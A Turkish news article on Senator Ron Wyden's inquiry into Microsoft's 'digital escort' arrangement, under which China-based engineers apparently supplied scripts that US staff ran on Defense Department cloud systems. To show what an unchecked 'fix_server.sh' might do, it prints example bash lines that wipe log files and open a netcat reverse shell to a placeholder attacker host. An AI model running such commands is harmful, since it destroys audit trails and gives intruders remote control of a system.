ABD’li senatör Ron Wyden, Temmuz 2025’te Savunma Bakanlığı’ndan (DoD) Microsoft’un Çin’deki mühendislerinin ABD askeri sistemlerine erişimi hakkında açıklama istedi ve “Bu model, ulusal güvenliğimiz için ciddi bir tehdit oluşturabilir.” dedi. Wyden’in sorusu, Microsoft’un az bilinen “dijital refakatçi” (digital escort) modelinin siber güvenlik açısından ABD için ciddi bir tehdit oluşturabileceğine dair artan endişelerin bir yansıması. Bu konudaki soruşturmalar ProPublica’nın yayınladığı rapor sonrasında gündeme geldi.
Kısaca hatırlatalım, Microsoft’un, bazı yazılım güncellemeleri ve sistem bakım işlemlerinde, Çinli mühendislerin çalıştırıldığı ortaya çıktı. Microsoft ABD askeri bulut sistemlerine doğrudan değil, ABD’li çalışanlar aracılığıyla dolaylı eriştiğini iddia ediyor. Ancak bu “aracılık”, gerçek zamanlı kod analizinden yoksun; bu nedenle kötücül bir kod parçacığı fark edilmeden sisteme sızabilir.
Microsoft’un dijital eskort modeliyle çalışan Çinli mühendisler kötü niyetli kodları, ABD’li bir personel üzerinden çalıştırır (kendileri doğrudan erişemez) çünkü ABD’li personel teknik denetim veya kod analiz uzmanı olmayabilir,
Yani Çinli mühendislerin sisteme erişimi sonucunda, ABD DOD sistemlerine zararlı yazılım yüklenebileceği iddia ediliyor. Kodun tam olarak analiz edilmemesi sonucu örneğin “fix_server.sh” gibi basit bir betik bile fark edilmeyebilir. Yüksek değerli veriler tehlikeye girebilir.
ProPublica Raporuna Göre Ne Oldu?
ProPublica’nın 2025 Temmuz tarihli araştırmasında şunlar iddia edildi; Dijital eskortlar, Çinli mühendislerin yazdığı betikleri kontrol etmeden çalıştırdı. Bunlardan biri “fix_server.sh” adlı basit bir dosyaydı. Microsoft, dosyanın içeriğini açıklamadı. Ancak uzmanlar, bu yöntemin “siber casusluk için kusursuz ortam” sunduğunu belirtti.
Microsoft Neden Bu Sistemi Kullandı?
Microsoft, bulut hizmetlerini küresel ekiplerle sürdürüyor. Ancak Çin yasaları, Çinli personelin yerel sistemlere erişimini zorunlu kılabiliyor. ABD ise Çin’den gelen doğrudan erişimi güvenlik riski olarak görüyor. Bu yüzden Microsoft “escort” sistemiyle bir ara çözüm kurdu.
- Çinli mühendis komutu hazırlar,
- ABD’li “dijital eskort” komutu çalıştırır.
Ama bu sistemde, kod analizi yapılmıyor, zararlı niyet varsa tespit edilmiyor.
Senatör Ron Wyden, Pentagon’dan şu konularda yanıt istedi
- Microsoft’un bu dijital eskort modelini ne kadar süreden beri kullandığı
- Çin’deki hangi mühendislerin hangi sistemlerde görev aldığı
- Bu sistemlerin hassaslık derecesi
- Çin’in erişimi hakkında hangi güvenlik denetimleri uygulandığı
- Pentagon’un alternatif sağlayıcılara yönelip yönelmeyeceği
fix_server.sh Nedir? Neden Bu Kadar Önemli?
“fix_server.sh” dosyası, Microsoft’un Çinli mühendislerin ABD Savunma Bakanlığı sistemlerine dolaylı erişim sağladığı “dijital eskort” (digital escort) modelinde tartışma konusu olan örnek bir bash script (komut dosyası) olarak gündeme geldi. .sh uzantısı, bir Linux/Unix kabuk betiği (shell script) olduğunu gösteriyor. “fix_server.sh” adı itibarıyla sunucularda düzeltme, yapılandırma ya da hata giderme işlemleri yaptığı izlenimi verir ama örneğin şöyle işlemler yapabilir;
- bash
- Kopyala
- Düzenle
- #!/bin/bash
- rm -rf /var/logs/*
- nc -e /bin/bash evil.server.cn 443
gibi: - log dosyası silme,
- arka kapı açma (reverse shell),
- veri yönlendirme işlemlerini gizli şekilde çalıştırmasına yol açabilir.
Soruşturmalar Sonucunda Ne Olabilir?
- Microsoft’a yönelik soruşturma açılabilir
- DOD, bu mühendislik modelini yasaklayabilir veya sınırlandırabilir
- AWS veya Oracle gibi alternatif sağlayıcılar daha fazla tercih edilebilir
- Microsoft, ABD için ayrı, izole bir mühendislik hattı oluşturmak zorunda kalabilir
Kaynak : 